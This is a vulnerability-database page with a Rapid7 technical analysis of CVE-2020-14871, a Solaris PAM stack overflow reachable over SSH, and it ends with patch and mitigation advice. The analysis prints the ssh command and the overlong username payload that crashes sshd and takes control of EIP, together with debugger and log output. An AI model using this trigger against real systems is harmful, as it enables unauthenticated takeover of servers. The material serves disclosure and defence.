Attacker Value
Very High
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
4

CVE-2020-14871

Disclosure Date: October 21, 2020
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Initial Access
Techniques
Validation
Validated

Description

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Add Assessment

4
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

Quick screenshot from yesterday showing EIP control:

Please see the Rapid7 analysis.

CVSS V3 Severity and Metrics
Base Score:
10.0 Critical
Impact Score:
6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • Oracle Corporation

Products

  • Solaris Operating System

Exploited in the Wild

Reported by:
Reported: November 02, 2020 11:08pm UTC (5 months ago)
Technical Analysis

Description

On Tuesday, October 20, as part of its October 2020 Critical Patch Update (CPU), Oracle published an advisory on CVE-2020-14871, a critical stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) component of Oracle Solaris. The vulnerability is easily exploitable over SSH, though not limited to it; successful exploitation could allow an unauthenticated, remote attacker to completely take over a vulnerable Solaris server. CVE-2020-14871 carries a CVSSv3 base score of 10.0.

On Monday, November 2, FireEye released research from Mandiant regarding their investigation of threat actor UNC1945, which allegedly targeted Oracle Solaris systems. Mandiant observed the use of a zero-day (0day) exploit against Solaris, allowing the threat actor to establish a foothold on affected systems. Mandiant disclosed the zero-day vulnerability to Oracle as CVE-2020-14871.

On the same day, security researcher Hacker Fantastic revealed technical details about CVE-2020-14871 and provided a proof-of-concept (PoC) exploit demonstrating the vulnerability. Hacker Fantastic noted that the keyboard-interactive authentication method needed to be enabled in SunSSH or OpenSSH in order to reach the vulnerable code.

On Wednesday, November 4, FireEye published their own blog post containing technical information about the vulnerability.

Affected products

FireEye lists the following affected products:

  • Solaris 9 (some releases)
  • Solaris 10 (all releases)
  • Solaris 11.0
  • Illumos (OpenIndiana 2020.04)

Rapid7 confirms that while Solaris 11.1 and later are vulnerable, the vulnerable code is not reachable via SSH due to username truncation. Thus, CVE-2020-14871 appears not to be exploitable over SSH in later versions of Solaris.

Rapid7 analysis

Rapid7 was able to reproduce the vulnerability against SunSSH 1.1.5 on Solaris 10. An empty username and long string of characters are used to trigger the vulnerability. The OpenSSH ssh(1) client can trivially perform the attack.

wvu@kharak:~$ ssh -vvvo StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o PreferredAuthentications=keyboard-interactive -l "" 172.28.128.13
[snip]
debug1: Remote protocol version 2.0, remote software version Sun_SSH_1.1.5
[snip]
debug1: Authenticating to 172.28.128.13:22 as ''
[snip]
debug3: preferred keyboard-interactive
debug3: authmethod_lookup keyboard-interactive
debug3: remaining preferred:
debug3: authmethod_is_enabled keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug2: userauth_kbdint
debug3: send packet: type 50
debug2: we sent a keyboard-interactive packet, wait for reply
debug3: receive packet: type 60
debug2: input_userauth_info_req
debug2: input_userauth_info_req: num_prompts 1
Please enter user name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
debug3: send packet: type 61
Connection closed by 172.28.128.13 port 22
wvu@kharak:~$

Sending a test payload of 512 A characters, 4 B characters, and 4 C characters will overwrite the username buffer, saved frame pointer (EBP), and saved return address (EIP) on the stack, respectively. This creates a SIGSEGV or segmentation fault crash in the target process, which can be seen below in the GDB debugger.

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0xfeea6000       -18194432
esp            0x80433b0        0x80433b0
ebp            0x42424242       0x42424242
esi            0x80c6c28        135031848
edi            0x0      0
eip            0x43434343       0x43434343
eflags         0x10246  [ PF ZF IF RF ]
cs             0x3b     59
ss             0x43     67
ds             0x43     67
es             0x43     67
fs             0x0      0
gs             0x1c3    451
(gdb)

EIP, otherwise known as the pointer to the current program instruction, now points to 0x43434343, which is CCCC in ASCII—a value we control. Since we control EIP, we control the flow of execution in the process. This is the first step toward remote code execution (RCE).

The enhanced SSH and PAM logs confirm the crash:

Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: userauth-request for user  service ssh-connection method keyboard-interactive
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: attempt 1 initial attempt 0 failures 1 initial failures 0
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: input_userauth_request: try method keyboard-interactive
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: keyboard-interactive devs
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Starting PAM service sshd-kbdint for method keyboard-interactive
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:conv)
Nov  4 18:06:28 unknown sshd[4524]: [ID 834998 auth.debug] PAM[4524]: pam_end(80c6c28): status = Conversation failure
Nov  4 18:06:28 unknown sshd[4524]: [ID 242859 auth.debug] PAM[4524]: pam_start(sshd-kbdint,,80a98a8:80c6c28) - debug = 1
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:service)
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:user)
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:conv)
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:rhost)
Nov  4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:tty)
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Calling pam_authenticate()
Nov  4 18:06:28 unknown sshd[4524]: [ID 799171 auth.debug] PAM[4524]: pam_authenticate(80c6c28, 0)
Nov  4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_authtok_get.so.1
Nov  4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate
Nov  4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_dhkeys.so.1
Nov  4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate
Nov  4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_unix_cred.so.1
Nov  4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate
Nov  4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_unix_auth.so.1
Nov  4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate
Nov  4 18:06:28 unknown sshd[4524]: [ID 174974 auth.debug] PAM[4524]: pam_get_user(80c6c28, 80c6c28, NULL)
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: PAM echo on prompt: Please enter user name:
Nov  4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Nesting dispatch_run loop
Nov  4 18:06:28 unknown sshd[4334]: [ID 800047 auth.debug] debug2: channel 0: rcvd adjust 49401
Nov  4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug1: got 1 responses
Nov  4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Nested dispatch_run loop exited
Nov  4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug1: PAM conv function returns PAM_SUCCESS
Nov  4 18:07:16 unknown genunix: [ID 603404 kern.notice] NOTICE: core_log: sshd[4524] core dumped: /var/cores/sshd.unknown.4524.1604534834.core
Nov  4 18:07:16 unknown sshd[4523]: [ID 800047 auth.debug] monitor debug1: child closed the communication pipe before user auth was finished
Nov  4 18:07:16 unknown sshd[4523]: [ID 800047 auth.debug] monitor debug1: Calling cleanup 0x807e79a(0x0)

Furthermore, a core dump of the process memory is deposited on the filesystem. Its standard location is /core and was changed for this test case.

root@unknown:/# file /var/cores/sshd.unknown.4524.1604534834.core
/var/cores/sshd.unknown.4524.1604534834.core:   ELF 32-bit LSB core file 80386 Version 1, from 'sshd'
root@unknown:/#

Rapid7 researchers were able to prove RCE. We believe attackers will be able to weaponize this vulnerability quickly.

Guidance

Oracle Solaris customers should apply Oracle’s patch for Solaris 10 and 11 immediately. Solaris 9 is no longer supported and has not received a patch. We recommend upgrading to a supported release.

As a partial mitigation, Solaris administrators may disable the keyboard-interactive authentication method in SunSSH or OpenSSH, preventing the PAM vulnerability from being reachable via SSH. This can be accomplished by setting KbdInteractiveAuthentication and ChallengeResponseAuthentication to no in /etc/ssh/sshd_config and restarting the SSH service.

References